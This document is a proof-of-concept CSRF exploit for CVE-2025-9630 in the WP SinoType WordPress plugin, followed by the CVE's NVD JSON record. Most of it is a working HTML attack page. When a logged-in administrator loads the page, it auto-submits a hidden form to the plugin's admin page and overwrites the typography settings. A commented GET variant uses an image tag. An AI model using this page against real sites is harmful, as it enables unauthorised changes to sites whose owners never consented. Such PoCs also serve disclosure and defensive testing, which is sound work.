CVE-2025-9630

<!-- CVE-2025-9630 PoC: CSRF exploit for WP SinoType WordPress Plugin --> <!-- This PoC demonstrates how an unauthenticated attacker can modify typography settings --> <!-- by tricking an authenticated admin into visiting a malicious page --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Loading...</title> </head> <body> <!-- Hidden iframe to auto-submit the CSRF request --> <iframe name="hidden_iframe" style="display:none;"></iframe> <!-- CSRF form targeting the sinotype_config function --> <!-- The action URL should point to the target WordPress site's admin-ajax.php or the plugin's config handler --> <form id="csrf_form" action="http://target-wordpress-site.com/wp-admin/admin.php?page=sinotype" method="POST" target="hidden_iframe"> <!-- Malicious typography configuration parameters --> <!-- These parameters modify the site's font settings without admin consent --> <input type="hidden" name="sinotype_action" value="save_config" /> <input type="hidden" name="sinotype_font_family" value="'Malicious Font', sans-serif" /> <input type="hidden" name="sinotype_font_size" value="999px" /> <input type="hidden" name="sinotype_font_color" value="#FF0000" /> <input type="hidden" name="sinotype_font_weight" value="900" /> <input type="hidden" name="sinotype_line_height" value="0" /> <input type="hidden" name="sinotype_letter_spacing" value="999em" /> <input type="hidden" name="submit" value="Save Changes" /> </form> <script> // Auto-submit the form when the page loads // The admin's browser will automatically include authentication cookies document.getElementById('csrf_form').submit(); </script> <!-- Alternative: Image-based CSRF (GET method variant) --> <!-- <img src="http://target-wordpress-site.com/wp-admin/admin.php?page=sinotype&sinotype_action=save_config&sinotype_font_size=999px" style="display:none;" /> --> </body> </html>

{"cve": {"id": "CVE-2025-9630", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:48.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP SinoType plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the sinotype_config function. This makes it possible for unauthenticated attackers to modify typography settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-sinotype/trunk/sinotype.php#L161", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-sinotype/trunk/sinotype.php#L65", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b02198f5-10df-4c4c-beed-aec8acacaec9?source=cve", "source": "[email protected]"}]}}